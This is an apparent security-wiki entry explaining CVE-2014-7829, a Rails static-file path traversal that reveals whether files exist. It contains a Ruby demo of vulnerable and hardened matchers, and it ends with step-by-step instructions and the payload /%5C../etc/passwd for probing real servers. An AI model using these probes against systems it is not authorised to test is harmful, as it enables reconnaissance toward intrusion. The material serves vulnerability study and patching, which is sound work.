File Name Enumeration

From Hackipedia
Hackerone #33935
Target: Hackerone
Target Module:
Type: Best Practice
Payload: /%5C../etc/passwd
Original: Link
CVE: CVE-2014-7829

Web applications running a vulnerable version of Action Pack (the actionpack gem of Ruby on Rails) are open to server file name enumeration. A request path containing an encoded backslash followed by two dots (%5C..) gets past the check in the static-file middleware that strips ".." segments, because the segment "\.." is not the string ".."; the file lookup that follows then resolves it as a parent-directory reference and walks out of the public directory. The file contents are never served, but the response for an existing file differs from the response for a missing one, so an attacker can test whether arbitrary files exist on the server's filesystem. This is CVE-2014-7829, issued because the fix for CVE-2014-7818 was incomplete.

Affected Rails (Action Pack) versions: 3.0.0 and greater
Not affected: versions before 3.0.0, and 4.2.0.beta4
Fixed versions: 3.2.21, 4.0.12, 4.1.8

For a Rails application to be vulnerable, serving of static files by the application itself must be enabled in its environment configuration (config/environments/*.rb):

config.serve_static_assets = true 

When this is false, the ActionDispatch::Static middleware is not added to the stack and the vulnerable lookup is never reached; deployments that serve the public directory from a front-end web server such as nginx commonly have it off in production, so check the setting (or probe, as below) before assuming a version match is exploitable.
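The following is an added example, not Rails source code: a cut-down model of the static-file matcher in Action Pack after the CVE-2014-7818 fix, placed next to a hardened matcher, so the "\.." behaviour described above can be reproduced offline. The fixture directory layout is constructed for the demo and the class and method names (VulnerableStatic, HardenedStatic, probe, build_fixture) are this example's own.

```ruby
# Added example, not the Rails source: a cut-down model of the static-file
# matcher in Action Pack after the CVE-2014-7818 fix, next to a hardened one.
# It shows why "%5C.." (an encoded backslash followed by "..") gets past the
# ".." segment filter and is still resolved as a parent directory.
# Assumptions: the fixture layout built below is constructed for the demo,
# and the class and method names are this example's own.
require "fileutils"
require "tmpdir"
require "uri"

PATH_SEPS = Regexp.union(*[File::SEPARATOR, File::ALT_SEPARATOR].compact)

# Textual cleanup shared by both matchers: drops "." segments and resolves
# ".." segments. The segment "\.." is not equal to "..", so it survives.
def clean_path_info(path)
  clean = []
  path.split(PATH_SEPS).each do |part|
    next if part.empty? || part == "."
    part == ".." ? clean.pop : clean << part
  end
  File.join(*clean)
end

class VulnerableStatic
  def initialize(root)
    @root = root
  end

  # Escapes glob metacharacters but not the backslash. Dir[] treats an
  # unescaped backslash as an escape, so the glob "\.." matches the literal
  # directory name ".." and the lookup walks out of @root.
  def escape_glob_chars(path)
    path.gsub(/[*?{}\[\]]/) { |c| "\\#{c}" }
  end

  # Returns the matched filesystem path, or nil.
  def match?(path)
    path = URI.decode_www_form_component(path)   # "%5C" -> "\"
    return nil unless path.valid_encoding?
    full_path = File.join(@root, escape_glob_chars(clean_path_info(path)))
    Dir["#{full_path}{,.html,/index.html}"].find { |m| File.file?(m) }
  end
end

class HardenedStatic
  def initialize(root)
    @root = File.expand_path(root)
  end

  # No glob at all: the cleaned relative path is joined and checked with
  # File.file?, and the expanded result must still sit under @root.
  def match?(path)
    path = URI.decode_www_form_component(path)
    return nil unless path.valid_encoding?
    return nil if path.include?("\\")            # never a valid asset name here
    rel = clean_path_info(path)
    [rel, "#{rel}.html", "#{rel}/index.html"].each do |candidate|
      full = File.expand_path(File.join(@root, candidate))
      next unless full.start_with?(@root + File::SEPARATOR)
      return full if File.file?(full) && File.readable?(full)
    end
    nil
  end
end

# Constructed fixture: <tmp>/public/index.html is meant to be served,
# <tmp>/secret.txt sits one level above the document root.
def build_fixture
  base = Dir.mktmpdir("static-demo")
  FileUtils.mkdir_p(File.join(base, "public"))
  File.write(File.join(base, "public", "index.html"), "<h1>hello</h1>\n")
  File.write(File.join(base, "secret.txt"), "outside the document root\n")
  File.join(base, "public")
end

# Runs the same requests through both matchers; true means "file found".
def probe(root)
  v = VulnerableStatic.new(root)
  h = HardenedStatic.new(root)
  {
    vulnerable_dotdot:    !v.match?("/../secret.txt").nil?,     # stripped -> false
    vulnerable_bs_dotdot: !v.match?("/%5C../secret.txt").nil?,  # glob escape -> true
    vulnerable_legit:     !v.match?("/index.html").nil?,
    hardened_bs_dotdot:   !h.match?("/%5C../secret.txt").nil?,
    hardened_legit:       !h.match?("/index.html").nil?,
  }
end

puts probe(build_fixture).inspect if __FILE__ == $0
```

Run it on a Unix host: the plain "/../secret.txt" request is neutralised by the segment filter in both matchers, while "/%5C../secret.txt" is found by the vulnerable matcher only. The hardened matcher follows the shape of the shipped fix (no Dir[] globbing, a plain File.file? check) and adds a containment check on the expanded path.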

How To Perform

  1. Start with a base URL (www.example.com).
  2. Request a path that certainly does not exist (www.example.com/lkdlkladlf) and note the response. Its status code, headers and body are the baseline for "file not found".
  3. Request a file that certainly exists on the server's filesystem as if it were under the public directory (www.example.com/etc/passwd). Without traversal this is looked up as public/etc/passwd and should match the baseline.
  4. Insert /%5C.. between the host and the path (www.example.com/%5C../etc/passwd). %5C is the URL-encoded backslash and must reach the server literally, so use a client that neither re-encodes the percent sign nor collapses dot segments (for curl, --path-as-is).
  5. Repeat with additional /%5C.. segments (www.example.com/%5C../%5C../etc/passwd, www.example.com/%5C../%5C../%5C../etc/passwd, and so on) until the path has climbed from the public directory to the filesystem root, and look for a response that differs from the baseline. A differing response indicates the file exists at that depth; a path to a file that does not exist keeps returning the baseline, and that difference is what makes enumeration possible.